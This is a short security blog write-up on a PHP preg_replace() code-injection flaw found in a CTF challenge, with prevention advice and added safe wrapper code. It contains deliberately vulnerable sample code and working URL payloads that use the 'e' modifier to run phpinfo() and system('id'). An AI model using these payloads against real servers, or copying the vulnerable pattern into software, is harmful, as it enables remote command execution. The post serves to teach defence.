Command Execution - preg_replace() PHP Function Exploit | RCE
Roshan Cheriyan · Follow
3 min read · Oct 10, 2020
I recently found some code vulnerable to this attack in the wild, so I thought
I’d put together a quick write up for pentesters and PHP coders who may not
be familiar with the danger.
preg_replace()

The preg_replace() function returns a string or array of strings where all matches of a pattern or list of patterns found in the input are replaced with substrings.

Let's analyse it with some sample code:
<?php
echo "<br>Welcome My Admin ! <br>";
if (isset($_GET['pat']) && isset($_GET['rep']) && isset($_GET['sub'])) {
    // All three arguments come straight from the query string: the user
    // controls the pattern itself, including its delimiter and modifiers.
    $pattern = $_GET['pat'];
    $replacement = $_GET['rep'];
    $subject = $_GET['sub'];
    echo "original : " . $subject . "<br>";
    echo "replaced : " . preg_replace($pattern, $replacement, $subject);
} else {
    die();
}
?>
Developers mostly use this function for word-filtering techniques, such as bad-word filters for email. The code above was taken from one of the CTF challenges that I played. It accepts user input and replaces matches in the user-supplied subject whenever the delimiter/pattern matches.

index.php?pat=/as/&rep=As&sub=as your wish exploit

After executing this, preg_replace() searches for `as` and replaces it with `As`.
Exploiting the code:

To exploit the code, all the attacker has to do is provide some PHP code to execute, generate a regular expression which replaces some or all of the string with the code, and set the `e` modifier on the regular expression/pattern.
payload: index.php?pat=/a/e&rep=phpinfo();&sub=abc
So we can execute whatever we want….
Based on the example above, the attacker can execute the id shell command
using the system() function in PHP.
payload : index.php?pat=/a/e&rep=system('id');&sub=abc
Once an attacker is able to execute OS commands, they could attempt to use
a web shell or install other malware. From there, an attacker may even
attempt to compromise other internal systems.
Prevention
PHP provides a function named preg_quote() which quotes all regex metacharacters in the input string and prevents this code execution vulnerability.

<?php
// The user controls only the literal text to search for; preg_quote() escapes
// every regex metacharacter and the '#' delimiter, so neither pattern syntax
// nor a modifier such as 'e' can be injected from the request.
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace('#' . preg_quote($_GET['replace'], '#') . '#',
    $_GET['with'], $in);
?>
Using preg_quote() renders all regex characters inert, so if you need to allow some use of regular expressions, you'll need to escape your delimiter character by hand. Be very careful though: this approach is error prone. You'll need to escape the escape character as well, otherwise the attacker can simply escape your escaping with their own escape character.
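The two defences described above, as added example code that is not part of the original article: a literal mode built on preg_quote(), and a regex mode that keeps the delimiter and modifier list under server control by choosing a delimiter absent from the user's pattern body rather than escaping it by hand. Function names are assumptions; note that the `e` modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where preg_replace() refuses it with a warning, so the injection as written only executes code on PHP 5.x, but the input-handling lesson applies on every version.

```php
<?php
// Added example, not from the original article: two wrappers that let a
// request choose what preg_replace() searches for without ever letting it
// choose the pattern's delimiter or modifiers. Function names are assumed.

// Literal mode: the whole search term is quoted, so the article's payload
// "/a/e" becomes the harmless text "/a/e" instead of a pattern with "e" set.
function literal_replace(string $search, string $with, string $subject): string
{
    $pattern = '#' . preg_quote($search, '#') . '#';
    return preg_replace($pattern, $with, $subject);
}

// Regex mode: the user supplies only the pattern body. Instead of escaping
// the delimiter by hand, pick a delimiter that does not occur in the body at
// all, so the body can never close the pattern and append its own modifiers.
// Modifiers come from a server-side allow-list ('i' or nothing here).
function regex_replace(string $body, string $with, string $subject, bool $ci = false): string
{
    $delim = null;
    foreach (['#', '~', '%', '@', '!'] as $d) {
        if (strpos($body, $d) === false) {
            $delim = $d;
            break;
        }
    }
    if ($delim === null) {
        throw new InvalidArgumentException('pattern body uses every candidate delimiter');
    }
    // An odd number of trailing backslashes would escape our closing
    // delimiter; reject it instead of letting PCRE fail on an open pattern.
    $trailing = strlen($body) - strlen(rtrim($body, '\\'));
    if ($trailing % 2 === 1) {
        throw new InvalidArgumentException('pattern body ends with an unpaired backslash');
    }
    $pattern = $delim . $body . $delim . ($ci ? 'i' : '');
    $out = @preg_replace($pattern, $with, $subject);
    if ($out === null) {
        throw new InvalidArgumentException('pattern failed to compile: error ' . preg_last_error());
    }
    return $out;
}

// Constructed demo: the article's payload in literal mode leaves "abc"
// untouched (phpinfo() is never evaluated), while regex mode still honours a
// real pattern with a backreference and the allow-listed 'i' modifier.
var_dump(literal_replace('/a/e', 'phpinfo();', 'abc'));
var_dump(regex_replace('a(b)', 'X$1', 'abc', true));
```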
The implications of this issue stretch far and wide. Its subtle yet deadly
nature make it an easy vulnerability to miss when developing and reviewing
code. Be careful out there, and always think about how you use your input.